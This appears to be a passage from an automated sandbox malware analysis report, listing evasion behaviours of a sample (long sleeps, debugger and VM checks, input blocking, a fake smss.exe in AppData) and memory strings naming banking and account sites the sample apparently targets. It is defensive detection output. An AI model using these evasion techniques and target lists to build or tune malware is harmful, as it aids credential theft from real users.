Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 7108 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7567 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2010 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Window / User API: threadDelayed 9730 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\smss.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\smss.exe API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\mshta.exe TID: 7952 Thread sleep count: 7108 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 7567 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 2010 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6680 Thread sleep count: 243 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6680 Thread sleep time: -486000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6680 Thread sleep count: 9730 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6680 Thread sleep time: -19460000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe TID: 7076 Thread sleep time: -35000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00A8445A
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8C6D1 FindFirstFileW,FindClose, 6_2_00A8C6D1
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00A8C75C
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00A8EF95
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00A8F0F2
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00A8F3F3
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00A837EF
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00A83B12
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00A8BCBC
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00A249A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 79T-I8k4c.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1573481868.0000000008011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: AtBroker.exe, 0000000C.00000002.2696221255.00000000030CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY&
Source: 79T-I8k4c.12.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 79T-I8k4c.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 7HLXbJFcuuGutQgrmx.exe, 0000000D.00000002.2697245010.0000000001439000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: powershell.exe, 00000003.00000002.1573481868.0000000007FEA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1573481868.0000000008069000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 79T-I8k4c.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 79T-I8k4c.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 79T-I8k4c.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 79T-I8k4c.12.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 79T-I8k4c.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000010.00000002.2101059567.000001DC06E5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 79T-I8k4c.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 79T-I8k4c.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 79T-I8k4c.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 79T-I8k4c.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 79T-I8k4c.12.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: powershell.exe, 00000003.00000002.1565515176.0000000004A49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 79T-I8k4c.12.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 79T-I8k4c.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000003.00000002.1573481868.0000000008011000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2185122Z
Source: 79T-I8k4c.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 79T-I8k4c.12.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 79T-I8k4c.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 79T-I8k4c.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\AppData\Roaming\smss.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5BBA0 rdtsc 7_2_03B5BBA0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417B23 LdrLoadDll, 7_2_00417B23
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A93F09 BlockInput, 6_2_00A93F09
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00A23B3A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A55A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_00A55A7C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A24B37 LoadLibraryA,GetProcAddress, 6_2_00A24B37
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_01A7A518 mov eax, dword ptr fs:[00000030h] 6_2_01A7A518
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_01A7A4B8 mov eax, dword ptr fs:[00000030h] 6_2_01A7A4B8
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_01A78E98 mov eax, dword ptr fs:[00000030h] 6_2_01A78E98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B533A5 mov eax, dword ptr fs:[00000030h] 7_2_03B533A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h] 7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h] 7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h] 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h] 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h] 7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h] 7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C053FC mov eax, dword ptr fs:[00000030h] 7_2_03C053FC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B663FF mov eax, dword ptr fs:[00000030h] 7_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF3E6 mov eax, dword ptr fs:[00000030h] 7_2_03BEF3E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0539D mov eax, dword ptr fs:[00000030h] 7_2_03C0539D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h] 7_2_03BEB3D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 7_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05341 mov eax, dword ptr fs:[00000030h] 7_2_03C05341
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B27330 mov eax, dword ptr fs:[00000030h] 7_2_03B27330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h] 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h] 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5F32A mov eax, dword ptr fs:[00000030h] 7_2_03B5F32A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 7_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B50310 mov ecx, dword ptr fs:[00000030h] 7_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD437C mov eax, dword ptr fs:[00000030h] 7_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF367 mov eax, dword ptr fs:[00000030h] 7_2_03BEF367
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h] 7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h] 7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov ecx, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFA352 mov eax, dword ptr fs:[00000030h] 7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D34C mov eax, dword ptr fs:[00000030h] 7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D34C mov eax, dword ptr fs:[00000030h] 7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB92BC mov eax, dword ptr fs:[00000030h] 7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB92BC mov eax, dword ptr fs:[00000030h] 7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB92BC mov ecx, dword ptr fs:[00000030h] 7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB92BC mov ecx, dword ptr fs:[00000030h] 7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B402A0 mov eax, dword ptr fs:[00000030h] 7_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B402A0 mov eax, dword ptr fs:[00000030h] 7_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h] 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h] 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h] 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h] 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h] 7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h] 7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h] 7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h] 7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC72A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC72A0 mov eax, dword ptr fs:[00000030h] 7_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C052E2 mov eax, dword ptr fs:[00000030h] 7_2_03C052E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6329E mov eax, dword ptr fs:[00000030h] 7_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6329E mov eax, dword ptr fs:[00000030h] 7_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6E284 mov eax, dword ptr fs:[00000030h] 7_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6E284 mov eax, dword ptr fs:[00000030h] 7_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h] 7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h] 7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h] 7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05283 mov eax, dword ptr fs:[00000030h] 7_2_03C05283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF2F8 mov eax, dword ptr fs:[00000030h] 7_2_03BEF2F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B292FF mov eax, dword ptr fs:[00000030h] 7_2_03B292FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
